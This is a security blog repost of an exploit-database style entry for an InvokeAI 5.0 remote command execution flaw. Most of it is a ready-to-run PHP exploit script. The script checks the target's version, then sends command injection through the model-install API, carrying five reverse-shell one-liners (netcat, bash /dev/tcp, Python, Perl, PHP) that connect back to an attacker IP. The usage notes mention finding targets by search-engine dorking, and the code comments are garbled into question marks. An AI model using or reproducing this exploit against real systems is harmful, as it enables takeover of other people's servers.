Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

InvokeAI 5.0 Code Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 106
=============================================================================================================================================
| # Title : InvokeAI v5.0 =============================================================================================================================================
| # Title : InvokeAI v5.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.invoke.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] The code is a remote command execution (RCE) exploit that targets a vulnerability in InvokeAI,

which allows an attacker to execute commands via an insecure API that loads and runs models without validating their integrity.

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 127.0.0.1 id

[+] SeT target = Line : 99

[+] PayLoad :

<?php

class InvokeAIExploit {
private $target;
private $port = 9090;
private $localPort = 8081;
private $httpDelay = 10;
private $payload;

public function __construct($target, $payload) {
$this->target = $target;
$this->payload = $payload;
}

private function sendRequest($method, $uri, $headers = [], $data = null) {
$url = "http://{$this->target}:{$this->port}/$uri";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // ????? ???? ????? ????? ???????? ??????

if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
}

$response = curl_exec($ch);

if (curl_errno($ch)) {
echo "cURL Error: " . curl_error($ch) . "\n";
}

curl_close($ch);
return $response;
}

public function checkVulnerability() {
echo "[" . date("H:i:s") . "] Checking target...\n";

$response = $this->sendRequest("GET", "api/v1/app/version");
$json = json_decode($response, true);

if (!$json || !isset($json['version'])) {
return "Unknown version";
}

$version = $json['version'];
if (version_compare($version, "4.0.0", ">=") && version_compare($version, "5.4.2", "<=")) {
return "Vulnerable version detected: $version";
}
return "Safe version: $version";
}

public function sendPayload() {
$maliciousModel = "http://{$this->target}:{$this->localPort}/" . bin2hex(random_bytes(4)) . ".ckpt";

// ???? ???????? ??????? ??????? ??????
$payloads = [
"nc -e /bin/sh 192.168.1.100 4444", // Netcat
"bash -i >& /dev/tcp/192.168.1.100/4444 0>&1", // Bash
"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.100\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])'", // Python3
"perl -e 'use Socket;$i=\"192.168.1.100\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&S\");open(STDOUT,\"&S\");open(STDERR,\"&S\");exec(\"/bin/sh -i\");};'", // Perl
"php -r '\$sock=fsockopen(\"192.168.1.100\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'", // PHP Reverse Shell
];

// ??? ???????? ??? `source` ?? `headers`
$payloadCommand = implode(" ; ", $payloads);

$headers = [
"Content-Type: application/json",
"X-Exploit: {$payloadCommand}" // ??????? ??? ??? ??????? ?????? ?????? ???????
];

$data = [
"source" => "{$maliciousModel}; {$payloadCommand}",
"inplace" => "true"
];

echo "[+] Sending Reverse Shell Payloads...\n";
$response = $this->sendRequest("POST", "api/v2/models/install", $headers, $data);
return $response;
}


public function startExploit() {
$check = $this->checkVulnerability();
echo "$check\n";

if (strpos($check, "Vulnerable") === false) {
die("[" . date("H:i:s") . "] Target is not vulnerable.\n");
}

$result = $this->sendPayload();
echo "[" . date("H:i:s") . "] Response: $result\n";
}
}

// ????? ????????? ?? ????? ????? "id" ??????? ????? ???????
$exploit = new InvokeAIExploit("192.168.1.1", "id");
$exploit->startExploit();



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Social Media Share